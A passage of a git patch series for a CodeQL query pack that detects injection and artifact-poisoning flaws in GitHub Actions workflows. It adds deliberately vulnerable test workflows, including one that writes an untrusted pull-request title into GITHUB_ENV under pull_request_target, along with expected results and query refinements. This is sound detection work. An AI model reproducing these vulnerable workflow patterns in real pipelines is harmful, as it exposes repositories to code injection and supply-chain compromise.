b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected @@ -0,0 +1,6 @@ +edges +nodes +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +subpaths +#select +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected new file mode 100644 index 00000000000..2692d03eefe --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected @@ -0,0 +1,6 @@ +edges +nodes +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +subpaths +#select +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml index d656fb65ea5..1ad46b0f6eb 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml @@ -36,7 +36,7 @@ jobs: if: ${{ always() }} - needs: job + needs: job1 steps: - id: sink diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml new file mode 100644 index 00000000000..3cab86f3171 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml @@ -0,0 +1,27 @@ +name: Pull Request Open + +on: + pull_request_target: + branches: + - main + - 14.0.x + + types: + - opened + - reopened + +jobs: + updateJira: + if: github.actor != 'dependabot[bot]' + runs-on: ubuntu-latest + steps: + - name: Checkout repository + uses: actions/checkout@v4 + + - name: Extract Jira Key + run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV + + - name: Sink + run: echo ${{ env.ISSUE_KEY }} + + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 2ad85054803..1fad288860e 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -50,6 +50,7 @@ edges | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | @@ -185,6 +186,9 @@ nodes | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -282,6 +286,8 @@ subpaths | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 7061f509b81..25441104064 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -50,6 +50,7 @@ edges | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | @@ -185,6 +186,9 @@ nodes | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -281,6 +285,8 @@ subpaths | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml new file mode 100644 index 00000000000..4755350f0fc --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml @@ -0,0 +1,34 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: actions/github-script@v6 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + - name: Run command + run: cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml new file mode 100644 index 00000000000..725038ab816 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml @@ -0,0 +1,21 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: dawidd6/action-download-artifact@v2 + with: + name: artifact_name + workflow: wf.yml + - name: Run command + run: cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml new file mode 100644 index 00000000000..4d2a9774753 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml @@ -0,0 +1,19 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${WORKFLOW_RUN_ID}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Run command + run: cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml new file mode 100644 index 00000000000..26d342f7060 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml @@ -0,0 +1,25 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + artifacts_url=${{ github.event.workflow_run.artifacts_url }} + gh api "$artifacts_url" -q '.artifacts[] | [.name, .archive_download_url] | @tsv' | while read artifact + do + IFS=$'\t' read name url <<< "$artifact" + gh api $url > "$name.zip" + unzip -d "$name" "$name.zip" + done + - name: Run command + run: cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml new file mode 100644 index 00000000000..3cab86f3171 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml @@ -0,0 +1,27 @@ +name: Pull Request Open + +on: + pull_request_target: + branches: + - main + - 14.0.x + + types: + - opened + - reopened + +jobs: + updateJira: + if: github.actor != 'dependabot[bot]' + runs-on: ubuntu-latest + steps: + - name: Checkout repository + uses: actions/checkout@v4 + + - name: Extract Jira Key + run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV + + - name: Sink + run: echo ${{ env.ISSUE_KEY }} + + diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected new file mode 100644 index 00000000000..8113215481c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected @@ -0,0 +1,4 @@ +| .github/workflows/artifactpoisoning1.yml:13:9:30:6 | Uses Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning2.yml:13:9:17:6 | Uses Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning3.yml:13:9:15:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning4.yml:13:9:21:6 | Run Step | Potential artifact poisoning. | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref new file mode 100644 index 00000000000..21d37e957a1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref @@ -0,0 +1,2 @@ +Security/CWE-829/ArtifactPoisoning.ql + diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index c3a3ec2f988..5a572edf423 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -1,5 +1,6 @@ | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning2.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning2.yml:13:9:17:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | From 2a1226c37a65cd5fab9b400845da5bbe692669bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 2 Apr 2024 12:54:42 +0200 Subject: [PATCH 0142/1267] Add workflow_dispatch to the triggers for artifact poisoning --- ql/src/Security/CWE-829/ArtifactPoisoning.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql index 5b0c4fc4e69..348b6bbdf08 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql @@ -16,7 +16,7 @@ import codeql.actions.security.ArtifactPoisoningQuery from LocalJob job, ArtifactDownloadStep download, Step run where - job.getWorkflow().getATriggerEvent() = "workflow_run" and + job.getWorkflow().getATriggerEvent() = ["workflow_run", "workflow_dispatch"] and (run instanceof Run or run instanceof UsesStep) and exists(int i, int j | job.getStep(i) = download and From a2bbf704ee0f488030c27bf928dbaa5c2550d0a3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Apr 2024 11:39:35 +0200 Subject: [PATCH 0143/1267] fix: triggering events for artifact poisoning --- ql/src/Security/CWE-829/ArtifactPoisoning.ql | 22 ++++++++++++++++++-- 1 file changed, 20 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql index 348b6bbdf08..5b71a64d52e 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql @@ -14,9 +14,27 @@ import actions import codeql.actions.security.ArtifactPoisoningQuery -from LocalJob job, ArtifactDownloadStep download, Step run +predicate isSingleTriggerWorkflow(Workflow w, string trigger) { + w.getATriggerEvent() = trigger and + count(string t | w.getATriggerEvent() = t | t) = 1 +} + +from Workflow w, LocalJob job, ArtifactDownloadStep download, Step run where - job.getWorkflow().getATriggerEvent() = ["workflow_run", "workflow_dispatch"] and + w = job.getWorkflow() and + ( + // The Workflow is triggered by an event other than `pull_request` + not isSingleTriggerWorkflow(w, "pull_request") + or + // The Workflow is only triggered by `workflow_call` and there is + // a caller workflow triggered by an event other than `pull_request` + isSingleTriggerWorkflow(w, "workflow_call") and + exists(ExternalJob call, Workflow caller | + call.getCallee() = w.getLocation().getFile().getRelativePath() and + caller = call.getWorkflow() and + not isSingleTriggerWorkflow(caller, "pull_request") + ) + ) and (run instanceof Run or run instanceof UsesStep) and exists(int i, int j | job.getStep(i) = download and From 119c7b81586a064426f4e10aef033d2101a4f8bf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Apr 2024 11:41:42 +0200 Subject: [PATCH 0144/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 7d2de60df75..e99a12dda08 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.4 +version: 0.0.5 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index f36c119e720..e37339e16cb 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.4 +version: 0.0.5 groups: - actions - queries From 2988bc8885d51529ea9b998076e8b3744e27fd28 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Apr 2024 15:39:00 +0200 Subject: [PATCH 0145/1267] Centralize isPrivileged decisions --- ql/lib/codeql/actions/Ast.qll | 21 +++++ ql/lib/codeql/actions/ast/internal/Ast.qll | 7 +- ql/src/Security/CWE-077/EnvVarInjection.ql | 11 ++- .../CWE-077/PrivilegedEnvVarInjection.ql | 13 ++- ql/src/Security/CWE-078/CommandInjection.ql | 11 ++- .../CWE-078/PrivilegedCommandInjection.ql | 13 ++- ql/src/Security/CWE-094/CodeInjection.ql | 11 ++- .../CWE-094/PrivilegedCodeInjection.ql | 13 ++- ql/src/Security/CWE-829/ArtifactPoisoning.ql | 22 +---- ql/src/Security/CWE-829/UntrustedCheckout.ql | 19 +--- .../Security/CWE-077/EnvVarInjection.expected | 1 - .../CWE-078/CommandInjection.expected | 1 - .../Security/CWE-094/CodeInjection.expected | 87 ------------------- 13 files changed, 75 insertions(+), 155 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index d865eb54905..17768245fdc 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -35,6 +35,8 @@ class AstNode instanceof AstNodeImpl { Workflow getEnclosingWorkflow() { result = super.getEnclosingWorkflow() } + CompositeAction getEnclosingCompositeAction() { result = super.getEnclosingCompositeAction() } + Expression getInScopeEnvVarExpr(string name) { result = super.getInScopeEnvVarExpr(name) } } @@ -123,6 +125,25 @@ class Workflow extends AstNode instanceof WorkflowImpl { Permissions getPermissions() { result = super.getPermissions() } Strategy getStrategy() { result = super.getStrategy() } + + predicate hasSingleTrigger(string trigger) { + this.getATriggerEvent() = trigger and + count(string t | this.getATriggerEvent() = t | t) = 1 + } + + predicate isPrivileged() { + // The Workflow is triggered by an event other than `pull_request` + not this.hasSingleTrigger("pull_request") + or + // The Workflow is only triggered by `workflow_call` and there is + // a caller workflow triggered by an event other than `pull_request` + this.hasSingleTrigger("workflow_call") and + exists(ExternalJob call, Workflow caller | + call.getCallee() = this.getLocation().getFile().getRelativePath() and + caller = call.getWorkflow() and + not caller.hasSingleTrigger("pull_request") + ) + } } class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index a1470a41dd0..3f9293bc972 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -95,10 +95,15 @@ abstract class AstNodeImpl extends TAstNode { JobImpl getEnclosingJob() { result.getAChildNode*() = this.getParentNode() } /** - * Gets the enclosing workflow statement. + * Gets the enclosing workflow if any. */ WorkflowImpl getEnclosingWorkflow() { this = result.getAChildNode*() } + /** + * Gets the enclosing composite action if any. + */ + CompositeActionImpl getEnclosingCompositeAction() { this = result.getAChildNode*() } + /** * Gets a environment variable expression by name in the scope of the current node. */ diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjection.ql index 2e978ad9e53..e758932b208 100644 --- a/ql/src/Security/CWE-077/EnvVarInjection.ql +++ b/ql/src/Security/CWE-077/EnvVarInjection.ql @@ -17,7 +17,16 @@ import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink -where EnvVarInjectionFlow::flowPath(source, sink) +where + EnvVarInjectionFlow::flowPath(source, sink) and + ( + exists(source.getNode().asExpr().getEnclosingCompositeAction()) + or + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + not w.isPrivileged() + ) + ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql index 6508b458629..811a6f65c7c 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql @@ -16,16 +16,13 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph -predicate isSingleTriggerWorkflow(Workflow w, string trigger) { - w.getATriggerEvent() = trigger and - count(string t | w.getATriggerEvent() = t | t) = 1 -} - -from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink, Workflow w +from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and - w = source.getNode().asExpr().getEnclosingWorkflow() and - not isSingleTriggerWorkflow(w, "pull_request") + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + w.isPrivileged() + ) select sink.getNode(), source, sink, "Potential privileged environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql index 826a3b41e38..de60141bb40 100644 --- a/ql/src/Security/CWE-078/CommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjection.ql @@ -17,7 +17,16 @@ import codeql.actions.security.CommandInjectionQuery import CommandInjectionFlow::PathGraph from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink -where CommandInjectionFlow::flowPath(source, sink) +where + CommandInjectionFlow::flowPath(source, sink) and + ( + exists(source.getNode().asExpr().getEnclosingCompositeAction()) + or + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + not w.isPrivileged() + ) + ) select sink.getNode(), source, sink, "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git 